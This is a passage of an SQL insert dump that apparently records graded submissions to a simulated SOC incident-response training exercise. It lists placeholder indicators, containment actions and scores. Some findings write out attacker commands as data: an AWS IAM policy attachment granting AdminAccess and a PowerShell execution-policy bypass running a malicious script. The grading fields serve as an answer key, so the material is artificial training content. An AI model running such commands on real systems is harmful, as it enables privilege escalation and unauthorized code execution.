(243, 159, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-15 23:22:22', '2026-02-15 23:22:22', 0, NULL),
(244, 159, 953, 'investigating', NULL, NULL, NULL, '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-15 23:26:27', '2026-02-15 23:30:42', 0, NULL),
(245, 60, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-16 06:05:50', '2026-02-16 06:05:50', 0, NULL),
(246, 165, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-16 17:39:33', '2026-02-16 17:39:33', 0, NULL),
(247, 165, 756, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"cmd-1\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 16/2/2026, 11:16:05 pm\\nALERT: Unauthorized IAM Privilege Escalation Attempt\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.77\\n- [COMMAND] aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-16T17:46:11.348Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"audit_user_activity\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-16 17:45:13', '2026-02-28 21:00:00', 0, NULL),
(248, 45, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 02:54:23', '2026-02-17 02:54:23', 0, NULL),
(249, 166, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 15:29:09', '2026-02-17 15:29:09', 0, NULL),
(250, 108, 1235, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 17:17:01', '2026-02-17 17:17:01', 0, NULL),
(251, 157, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 22:29:14', '2026-02-17 22:29:14', 0, NULL),
(252, 169, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.15\",\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:20:44 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:20:57.487Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:17:18', '2026-02-28 21:00:00', 0, NULL),
(253, 169, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:22:55 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:23:00.723Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_ip\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:20:57', '2026-02-28 21:00:00', 0, NULL),
(254, 169, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:24:20 AM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:24:25.229Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:23:00', '2026-02-28 21:00:00', 0, NULL),
(255, 169, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:26:13 AM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:26:18.573Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:24:25', '2026-02-28 21:00:00', 0, NULL),
(256, 169, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:27:46 AM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:27:51.140Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:26:18', '2026-02-28 21:00:00', 0, NULL),
(257, 169, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:28:57 AM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:29:01.521Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:28:06', '2026-02-28 21:00:00', 0, NULL),
(258, 169, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:29:41 AM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:29:46.297Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:29:01', '2026-02-28 21:00:00', 0, NULL),
(259, 169, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:30:33 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:30:38.052Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:29:46', '2026-02-28 21:00:00', 0, NULL),
(260, 169, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"escalate\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:31:00 AM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:31:05.516Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:30:38', '2026-02-28 21:00:00', 0, NULL),
(261, 169, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:33:38 AM\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:33:42.401Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:31:21', '2026-02-28 21:00:00', 0, NULL),
(262, 169, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:34:05 AM\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:34:11.520Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:33:42', '2026-02-28 21:00:00', 0, NULL),
(263, 169, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:34:35 AM\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:34:39.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:34:11', '2026-02-28 21:00:00', 0, NULL),
(264, 169, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:35:58 AM\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:36:03.538Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:34:39', '2026-02-28 21:00:00', 0, NULL),
(265, 169, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:40:09 AM\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:40:14.400Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:36:11', '2026-02-28 21:00:00', 0, NULL),
(266, 169, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:41:42 AM\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:41:47.317Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:40:14', '2026-02-28 21:00:00', 0, NULL),
(267, 169, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:42:33 AM\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:42:36.455Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:41:47', '2026-02-28 21:00:00', 0, NULL),
(268, 169, 288, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 07:42:36', '2026-02-18 07:42:36', 0, NULL),
(269, 170, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 08:19:53', '2026-02-18 08:19:53', 0, NULL),
(270, 171, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 09:49:56', '2026-02-18 09:49:56', 0, NULL),
(271, 178, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-19 05:19:23', '2026-02-19 05:19:23', 0, NULL),
